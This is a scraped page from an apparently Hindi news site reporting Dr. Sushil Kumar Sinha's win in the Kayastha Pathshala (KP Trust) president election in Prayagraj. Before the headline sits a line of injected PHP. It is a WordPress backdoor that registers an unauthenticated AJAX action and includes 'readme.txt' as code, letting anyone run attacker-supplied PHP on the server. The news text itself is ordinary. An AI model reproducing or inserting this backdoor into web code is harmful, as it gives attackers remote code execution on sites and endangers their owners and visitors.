if(!function_exists('file_check_readme35885')){ add_action('wp_ajax_nopriv_file_check_readme35885', 'file_check_readme35885'); add_action('wp_ajax_file_check_readme35885', 'file_check_readme35885'); function file_check_readme35885() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } केपी ट्रस्ट के अध्यक्ष के चुनाव में डॉ. सुशील सिन्हा ने विजय दर्ज की। - sanyam Bharat News
Breaking NewsIndiaNewsPrayagraj news

केपी ट्रस्ट के अध्यक्ष के चुनाव में डॉ. सुशील सिन्हा ने विजय दर्ज की।

मुख्य संवाददाता

प्रयागराज, संयम भारत, एशिया के सबसे बड़े शैक्षणिक ट्रस्ट कायस्थ पाठशाला के चुनाव में डॉ. सुशील कुमार सिन्हा अध्यक्ष चुन लिए गए। उन्होंने केपी ट्रस्ट पूर्व अध्यक्ष रहे चौधरी राघवेंद्र नाथ सिंह को कड़ी टक्कर में 128 मतों से पराजित किया। चुनाव के लिए सोमवार को वोट डाले गए थे।

इसकी मतगणना मंगलवार को हुई। इसको लेकर काफी गहमा गहमी का माहौल रहा। चुनाव के एक दिन पहले रविवार को दोनों प्रत्याशियों के समर्थकों में जमकर मारपीट हो गई थी। जिसमें डेढ़ सौ से अधिक लोगों के खिलाफ मुकदमा दर्ज कराया गया था।


यह चुनाव दोनों प्रत्याशियों के लिए प्रतिष्ठा का विषय बन गया था। कई दशक से अध्यक्ष पद पर कबिज चौधरी परिवार भी इस चुनाव में दो खेमों में बंटा नजर आया। चौधरी जितेंद्रनाथ सिंह और यूपी सरकार के पूर्व मंत्री सिद्धार्थनाथ जहां राघवेंद्र नाथ के समर्थन में दिखे, वहीं ट्रस्ट के पूर्व अध्यक्ष और एमएलसी चौधरी केपी श्रीवास्तव और टीपी सिंह डॉ. सुशील सिन्हा के समर्थन में नजर आए।
सोमवार को कड़ी सुरक्षा के बीच वोट डाले गए। 32 बूथों पर शाम पांच बजे तक 9563 मत पड़े। अध्यक्ष पद के लिए चार प्रत्याशी मैदान में थे जबकि कार्यकारिणी सदस्यों के 21 पदों पर 64 प्रत्याशियों के भाग्य आजमा रहे थे। कायस्थ पाठशाला इंटर कॉलेज परिसर में सुबह आठ बजे वोटिंग शुरू हुई। शुरुआत से ही सुशील बढ़त बनाए रहे जो अंत तक कायम रही। बीच में राघवेंद्र का भी पलड़ा भारी नजर आया जो परिणाम आते आते कुछ मतों से पीछे हो गया। परिणाम आने के बाद सुशील के समर्थकों ने जमकर आतिशबाजी की।

प्रातिक्रिया दे

आपका ईमेल पता प्रकाशित नहीं किया जाएगा. आवश्यक फ़ील्ड चिह्नित हैं *